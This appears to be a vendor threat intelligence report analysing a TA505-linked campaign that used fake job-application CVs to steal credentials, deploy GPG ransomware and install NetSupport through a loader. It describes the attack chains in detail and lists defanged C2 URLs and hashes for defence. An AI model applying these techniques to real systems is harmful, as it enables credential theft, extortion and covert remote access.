The Curious Case of the Criminal Curriculum Vitae

19 March 2020

Executive Summary

The Tailored Intelligence Team at Prevailion has detected a new campaign—at least a facet of which is currently active—dubbed The Curious Case of the Criminal Curriculum Vitae.

In this newly discovered campaign, threat actors targeted German companies with trojanized emails disguised as job applicants. While this activity appeared to be geographically based in Germany, these same techniques could easily be applied to any organization.

Once the email attachment was activated, a company’s secure credentials and credit card data could be transmitted covertly to the threat actors. In the 2019 iterations of this attack, the attackers used commercial tools to encrypt all the users files, which suggests this recent activity could also lay the groundwork for an infection vector into the company’s network to encrypt files.

In a second cluster of activity used a more sophisticated approach. They fetched an instance of Netsupport, a commercial remote administration tool, hosted on a user’s Google Drive account. This enabled a host of actions, including remote file transfer, screen captures, and even voice recordings. Since these threat actors are abusing legitimate binaries such as GPG tools and NetSupport, they are unlikely to be removed by traditional antivirus software.

Based upon the overlap in infrastructure between these two clusters, we associate these clusters of activity to the same threat actor with high confidence. Upon further inspection of the second cluster samples, we were able to correlate it to known TA505 activity based upon the digital signature used to sign the binary.

Technical Details

Cluster 1 Activity

Threat actors have continued to rely upon business email compromise (BEC) to initially infect their victims. This technique is particularly hard to defend against when malicious emails mimic normal business interactions. In this particular case the threat actor impersonated an applicant who sought a job and attached a trojanized version of a Curriculum Vitae (or CV). The sample below was then sent to the human resources department at German-speaking businesses. All observed source email addresses in this case were created through

Image of the malicious email sent to victims in January 2020

The message above roughly translates to:

Dear Sirs and Madames,

I am enclosing my CV in tabular form.

For further questions I am gladly at your disposal.

Friendly greetings

Leon Jager

If the victim clicked on the CV file, lebensaluf_2020_1_7.iso, an embedded Microsoft shortcut (.lnk) file will initiate and run a PowerShell script from the new host. The script begins by reaching out to a threat actor controlled IP address (hxxp://194.36.189[.]215/) to download two files, the first was a copy of rar.exe, and the second was a rar compressed folder named “dmnn.rar”. The first file – rar.exe – is a legitimate binary, used to decompress and compress data files. In this case, it is utilized to decompress the second data file, “dmnn.rar”.

Once decompressed, the dmnn.rar file contained three files named:

  • Lebenslauf_2020_1_7.jpeg
  • Dmn.bat
  • Sqlite3.exe.

The aforementioned lnk file would first display the image file “lebenslauf_2020_1_7.jpeg”, likely in an attempt to avoid suspicion among the victims.

Image of the Lebenslauf_2020_1_7.jpeg, as it would appear to victim

Next, the Microsoft lnk file will start the “dmn.bat” file using PowerShell. This dmn.bat is rather large, so in order to make it easier to understand, we will describe it in three parts. The first part changed the active console code to “Multilingual” (Latin I) so the code will run regardless of the environment configurations. This first segment enumerated the host machine:

  • Determine all the programs names installed on the machine,
  • Version of the programs,
  • Date the programs were installed,
  • Determine the computer’s name,
  • Determine the computer’s domain.

The script then proceeds to generate a string of eight random characters, likely as a unique identifier for each workstation. If the computer name and domain are not the same, it sends that information along with the unique identifier to the threat actor controlled C2 located at URI hxxp://194.36.189[.]215/firstga990.php

The second part of the script attempted to gather saved credentials, cookies, and credit cards. Specifically, it looks for the following information:

  • use the sqlite3.exe to obtain saved cookies, login data, and web data (such as credit card numbers) from Google Chrome,
  • It would attempt to grab saved login passwords as well as cookies from ThunderBird, Mozilla, and Edge applications
  • Kill all task hosts and dll hosts processes
  • Enumerate and harvest outlook credentials.

Image showing the process obtained saved information from Chrome browser

Once all the saved credentials were obtained, it wrote the output into the “safsff3f” directory. That directory is then compressed using rar and renamed as the aforementioned unique identifier. The newly compressed file was then sent back to the threat actor controlled C2, specifically the URI “hxxp://194.36.189[.]215/ris.php”

Lastly it created a scheduled task with the same name as the unique identifier. The task runs every minute, transmitting the unique identifier back to the C2 – likely as a heartbeat beacon. Finally, the bat file will delete all the files that were downloaded, created, and modified from the host machine. While this walkthrough is for the campaign that occurred on January 17th, 2020, we have observed these same techniques being used back until July of 2019.

GPG Ransomware from June 2019 Strain 

Once we analyzed the aforementioned samples, we discovered a similar rar file from June of 2019 that included a ransomware component. Like the previous operations, this one began with a file named “Lebenslauf_2019_6_6.iso” which contained an embedded Microsoft lnk file from June 2019. This Microsoft lnk file is almost identical to the one from January 2020.

Images showing the lexicon similarities between the iso files

The Microsoft link file again obtains both a rar executable and a rar compressed folder. Once unpacked, this folder contained the following files:

  • Brg.brg, which contains a public 2048 bit RSA key
  • Brk.bat, a batch script to encrypted stored files
  • Sh.vbs, visual basic script to delete all shadow copies as system
  • Lebensaluaf_2019_6_6, an image file,
  • Gpg.exe, GPG executable
  • Gpgconf.exe, support file for GPG tools
  • Libassuan-0.dll, support file for GPG tools
  • Libgcrypt-20.dll, support file for GPG tools
  • Libgpg-error-0.dll, support file for GPG tools
  • Libnpth-0.dll, support file for GPG tools
  • Libsqlite3-0.dll, support file for GPG tools
  • Zlib1.dll, support file for GPG tools

The main difference between this example and 2019 strain, was the inclusion of the GPG suite files. The batch file would encrypt all the drives on the local machine using the public GPG key “brg.brg”. Next it will compress the files and send some host based data to the email address

Image of the malicious batch file

It would then display the following message to the victim, please note this is a verbatim copy of the message:


“All important files and information on this comuter (documents, databases, etc.) will be decrypted using a RSA cryptographic algorithm”

“Without special software decoding a single file with the help of the most powerful computers will take about a 20 years.”

“contact an expert  on e-mail: or”

The visual basic script proceeds to delete the shadow copy of the files as “system,” using Windows Management Instrumentation. The files that were in the compressed folder are deleted, and following that a web request is sent to the URI “hxxp://185.106.120[.]31/ok”

During our investigation, we were able to identify another folder with the ransomware strain, containing file names that indicate it was from May of 2019. This folder once again contained GPG keys and a public key that is used to encrypt all the local files. There were only a few small differences – the first is that the encrypting functions were written in visual basic instead of as a batch file. In this sample, the batch file simply contained a short script to delete all the downloaded files. Despite the damages this compressed folder could cause, we noticed it had a relatively low detection rate.

Virustotal detection rate for compressed tog.rar file, containing GPG ransomware script

The second difference were the email addresses used to contact the threat actor: blklock{at} and hopionion123{at} Anecdotally, we found a post on an Eset forum where someone claimed to be victimized by this threat actor. We correlated these events based upon the same email address being found in the ransomware message that stated they should contact blklock{at} – from a user in Germany. While this first cluster of activity appeared to be geographically based in Germany, these same techniques could easily be applied to any organization looking to recruit new applicants.

Cluster 2 – “REKT” and NetSupport Remote Admin Tool

Overlap between with a Remote Administration Tool 

Once we identified the C2 nodes that were used to host the malicious compressed rar files, we noticed that they also hosted executable files. In the recent campaign of February 2020, the threat actor used the C2 node, 194.36.189[.]215, to host both the malicious rar folder and the executable, named rrr.zzz, on the same day according to Virustotal.

Virustotal screenshot with both the CV rar and the new sample being hosted on the same date

Upon further examination of the C2 used in the January campaign, 185.244.150[.]143, also hosted a variant of the same executable, “fnb.111”. Based upon the infrastructure overlap in two separate cases, we assess with high confidence that the same threat actors who were responsible for the “Curriculum Vitae” attack were associated with this new agent.

The Rekt Loader 

Luckily one of the files, rrr.zzz, still had the debug strings which aided us in our efforts to better understand the agent. For example, we were able to extract the following PDB string:

            “C:\\Users\\Андрей\\Desktop\\readme\\proj\\tst – копия\\Debug\\rekt.pdb”

This led us to believe that the threat actors named this particular loader “rekt”. Not to be confused with the ransomware REKTlocker. The sample was written in c and c plus plus in visual studio 2017. The primary purpose of this loader was to download additional payloads. The samples contacted three unique URLs, all of which were hosted on Google Drive. It used a hard-coded user agent string in order to contact Gdrive.

            Mozilla / 5.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)

2nd Stage – NetSupport

Once the rekt loader contacted the three Google Drive URLs, it downloads the following files:

  • 7zip.exe, a benign program used to compressed/decompress files
  • A batch file
  • A password-protected 7zip file

The rekt loader would then run the batch file; this batch file utilized the 7zip executable to decompress the folder and entered the requisite password. Once decompressed the files were redirected to the directory “%APPDATA%”. Afterward, it would add a “Run” registry key for persistence to start “host.exe”. The registry key modified was HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run.
Next, it would start the host.exe file that was downloaded and following completion, kill the rundll32.exe files, change the %TEMP% directory and finally delete the batch file, and the 7zip executable.

Image of the batch file hosted on Google Drive

The host.exe file was identified as NetSupport; Netsupport is a commercially available software program that offers remote desktop software to customers. Since this is a commercially available product, it was a signed windows binary, making it unlikely to be flagged by antivirus products. While this tool, and those like it, were intended to be used as authorized administratives and information technology staff they can also be abused by nefarious actors. Once this tool is deployed it provides the following capabilities:

  • remotely transferring files
  • geo-location of the infected machine
  • Ability to screenshots,
  • Remotely turn on the microphone to capture audio.

The only file that appeared to be modified by the threat actor was client32.ini, where the threat actors were able to enter their own gateway address as hxxp://23.227.207[.]138:12233.

Correlations to Prior Reporting

Once we identified the Rekt loader, we began to look for other variants of this sample. We identified an older variant from 2019, although we highly suspect there are likely additional samples. The sample from April 2019 was hosted on a compromised domain, hxxp://juristlex[.]com/photo/photo88326635[.]scr. Our evaluation showed that it appeared to be very similar to the agent from 2020.

One big difference was that this particular sample was signed with a digital signature from “Allo’ Ltd”. The company named “Allo’ Ltd” appeared to be a convenience store, or bodega, in the United Kingdom that closed in 2018. Searching on the properties of of that digital signature, we identified two “flawwed ammy” trojans. The digital signature used to sign two “flawwed ammy” trojans was referenced in a report by the South Korean FSI-Cert report, released earlier this year on TA505 activity. Both the flawwed ammy signature and the one used on the 2019 rekt sample referenced the same company, same address and expired on the same day at the same time. All three hashes and the digital signature serial number can be found below in the IOC section. We assess it was highly unlikely that another actor would impersonate the same organization to obtain a digital signatures for binaries, therefore we correlate the Rekt agent and the C2 nodes used to host them to TA505 with moderate confidence.

Digital Signature for the 2019 Rekt sample on the left, Flawwed Ammy sample on the right

Operation overview showing overlap between campaigns

When we analyzed the TTPs associated with this second cluster of activity, we observed similarities to reports by both Palo Alto and FireEye. The strongest correlation was with the Palo Alto report, where they observed the NetSupport RAT being deployed, and then observed it communicating with a hard-coded IP address ending in “/fakeurl.hml”. The one difference they observed was NetSupport being downloaded by a PowerSploit module, whereas we observed it being downloaded from the rekt loader. There were also some similarities between this campaign and a FireEye report, where they observed a threat actor using a benign version of 7zip, and a batch file that contained a password to decompress a folder containing NetSupport. In the FireEye report, the victims were compromised by visiting water holed websites.


This entity has achieved a high level of success due to their ability to abuse legitimate binaries for nefarious purposes. Two examples of this are the use of GPG tools to encrypt all the files on a machine; and employing a legitimate remote systems administration tool that already has all the functionality they need, while reducing the risk of being detected. Since the binary was signed, even if it was detected by an anti-virus engine, it has great potential to mistakenly be ignored as software that was intentelly installed by the network administrator.

In order to protect against TA505 and BEC in general, we recommend using an email security solution. End users should regularly update their antivirus product of choice, particularly on high-risk users who are opening files from untrusted sources. In order to protect a corporate environment against ransomware attacks, the corporate network should be segmented to impede attackers’ ability to spread laterally once they gain access. Strong passwords should be used for all corporate accounts, along with a password manager. For guidance on how to create strong passwords, click here.

Prevailion has shared our findings, including file samples and indicators of compromise, in this report with Cyber Threat Alliance members. The CTA uses this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat Alliance, visit

Indicators of Compromise

Cluster 1 Activity – 2020 Strain

Campaign 0









Rar.exe: 5a0898b193b27b8b962c9519d756f0631b62a6a0658a676ffc84744edbff0e10








Campaign 1








Campaign 2










Campaign 3













Campaign 4







Campaign 5












Campaign 6







Campaign 7










Ransomware Strain

Campaign 8





















Campaign 9









Trkop.vbs: 101f060edf89f4362ee6657acc110f88d3140090fb676620049a2407b503b837  yin1abtn.cq124aqq:cca91cc9bcf32f8bd9e2dddd0c001b4b4c4a83b812d4b30512fcb40f09b07403


Rekt and NetSupport

January Campaign

ITW URL:hxxp://194.36.189[.]215/fnb.111

File name:fnb.111


Contacted URLs




(The order of the hashes corresponds to the order URLs listed above)

NetSupport Zipped file: 4804edbbb8275cd465d7c1c520f97a1a5007f6234d4562a3ae9ed01110b429ce

Bat file:0cbaf48d543d06c838ad30e28b7cf92732a93e0507d3f3af4a7ab934890fe2fe

7z.exe (benign):c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf

NetSupport Remote Administrative tool (abused binary)




February Campaign

ITW URL:hxxp://185.244.150[.]143/rrr.zzz

File name:rrr.zzz


Contacted URLs




(The order of the hashes corresponds to the order URLs listed above)

Bat file:30bcc93e492c88032dd058c413e49c6cffa446f13d0311d5fb8980dbd923746b

NetSupport Zipped file: 0cbaf48d543d06c838ad30e28b7cf92732a93e0507d3f3af4a7ab934890fe2fe

7z.exe (benign):c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf

NetSupport Remote Administrative tool (abused binary)




2019 Rekt Sample


File name:photo88326635.scr


Digital Signature serial number:75 DF 42 48 6D A0 6F 02 65 BE 10 98 04 D9 FB 13

Email address associated within digital signature:vanya.tanichew{at}

Contacted URLs




Flawwed Ammy samples that shared the digital certificate properties



Digital Signature Serial number:00 F4 24 13 EE 41 08 72 60 A5 07 6D DA F1 C0 76 C5

The Latest

Prevailion CEO, Karim Hijazi – Cheddar News- FCC commissioner calls on Apple and Google to ban TikTok app

A member of the FCC renewed urgency calls on Apple and Google to remove TikTok from their app stores, raising concerns that TikTok’s Chinese-based parent company is collecting user data that is being accessed in China.

IRONSCALES Cyber Security Heroes: The New Cyber Era Post Ukraine Invasion

What Wicked Webs We Un-weave

What Wicked Webs We Un-weave: Wizard Spider once again proving it isn’t you, it isn’t me; we search for things that you can’t see Authored by: Matt Stafford and Sherman Smith Executive summary: In late January 2022, Prevailion’s Adversarial Counterintelligence Team (PACT) identified extensive phishing activity designed to harvest credentials for Naver. Naver is a […]

Copyright 2023 Prevailion, Inc. All rights reserved.    

Disclaimer: Gartner “Cool Vendors in Security Operations and Threat Intelligence,” Mitchell Schneider, Ruggero Contu, John Watts, Craig Lawson, October 13, 2020. GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved. Gartner Disclaimer: The GARTNER COOL VENDOR badge is a trademark and service mark of Gartner, Inc. and/or its affiliates and is used herein with permission. All rights reserved. Gartner does not endorse any vendor, product or service depicted in its research publications and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s Research & Advisory organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.